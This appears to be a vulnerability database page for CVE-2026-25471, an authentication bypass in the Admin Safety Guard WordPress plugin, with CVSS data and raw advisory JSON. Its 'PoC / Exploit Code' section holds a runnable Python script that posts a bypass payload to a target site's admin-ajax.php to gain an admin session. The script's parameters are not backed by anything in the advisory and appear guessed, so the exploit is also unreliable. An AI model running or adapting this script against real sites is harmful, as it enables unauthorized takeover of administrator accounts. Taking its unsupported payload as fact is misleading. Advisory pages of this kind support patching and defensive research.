Security Vulnerability Report
中文
CVE-2026-25471 CVSS 8.1 HIGH

CVE-2026-25471

Published: 2026-03-19 08:16:19
Last Modified: 2026-04-28 19:37:08

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Themepaste Admin Safety Guard admin-safety-guard allows Password Recovery Exploitation.This issue affects Admin Safety Guard: from n/a through <= 1.2.6.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

admin-safety-guard <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-25471 PoC - Admin Safety Guard Authentication Bypass # Target: WordPress site with admin-safety-guard plugin <= 1.2.6 def exploit_admin_safety_guard(target_url): """ Exploit for CVE-2026-25471 Authentication Bypass via Password Recovery Exploitation """ target = target_url.rstrip('/') # Step 1: Identify the vulnerable password reset endpoint endpoint = f"{target}/wp-admin/admin-ajax.php" # Step 2: Exploit the authentication bypass # The vulnerability allows bypassing authentication via alternate path payload = { 'action': 'admin_safety_guard_verify', 'username': 'admin', 'security_token': 'bypass' } try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: # Check if we received a valid session token if 'set-cookie' in str(response.headers).lower() or \ 'authenticated' in response.text.lower(): print(f"[+] Authentication bypass successful!") print(f"[+] Response: {response.text[:200]}") return True print(f"[-] Exploitation failed or target not vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-25471.py <target_url>") sys.exit(1) exploit_admin_safety_guard(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25471", "sourceIdentifier": "[email protected]", "published": "2026-03-19T08:16:19.140", "lastModified": "2026-04-28T19:37:07.930", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Themepaste Admin Safety Guard admin-safety-guard allows Password Recovery Exploitation.This issue affects Admin Safety Guard: from n/a through <= 1.2.6."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación usando una ruta o canal alternativo en Themepaste Admin Safety Guard permite la explotación de la recuperación de contraseña. Este problema afecta a Admin Safety Guard: desde n/a hasta 1.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/admin-safety-guard/vulnerability/wordpress-admin-safety-guard-plugin-1-2-2-broken-authentication-vulnerability?_s_id=cve", "source": "[email protected]"}]}}